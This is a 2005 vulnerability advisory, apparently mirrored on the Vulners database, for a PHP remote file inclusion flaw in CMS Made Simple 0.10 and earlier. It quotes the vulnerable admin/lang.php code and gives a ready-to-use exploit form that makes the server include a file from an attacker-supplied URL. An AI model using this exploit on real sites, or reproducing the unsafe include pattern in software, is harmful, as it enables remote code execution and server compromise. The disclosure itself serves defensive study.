` -- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: CMS Made Simple - PHP injection
Version <= 0.10
Homepage: http://www.cmsmadesimple.org/
Author: Filip Groszynski (VXSfx)
Date: 31 August 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Background:
CMS Made Simple is an easy to use content managment
system for simple stable content site. Uses PHP, MySQL
and Smarty templating system.
--------------------------------------------------------
Vulnerable code exist in ./admin/lang.php:
<?php
...
$current_language = "en_US";
#Only do language stuff for admin pages
[!] if (isset($CMS_ADMIN_PAGE)) {
...
#Check to see if there is already a language in use...
if (isset($_POST["change_cms_lang"])) {
[!] $current_language = $_POST["change_cms_lang"];
setcookie("cms_language", $_POST["change_cms_lang"]);
} else if (isset($_COOKIE["cms_language"])) {
$current_language = $_COOKIE["cms_language"];
}
else {
...
}
#Ok, we have a language to load, let's load it already...
if (isset($nls['file'][$current_language])) {
foreach ($nls['file'][$current_language] as $onefile) {
[!] include($onefile);
}
}
...
}
...
?>
--------------------------------------------------------
Exploit:
example.html:
<form action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
<input type=hidden name=change_cms_lang value=vx>
<input type=submit name=test VALUE="do it">
</form>
EOF
--------------------------------------------------------
Contact:
Author: Filip Groszynski (VXSfx)
Location: Poland <Warsaw>
Email: groszynskif <|> gmail <|> com
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation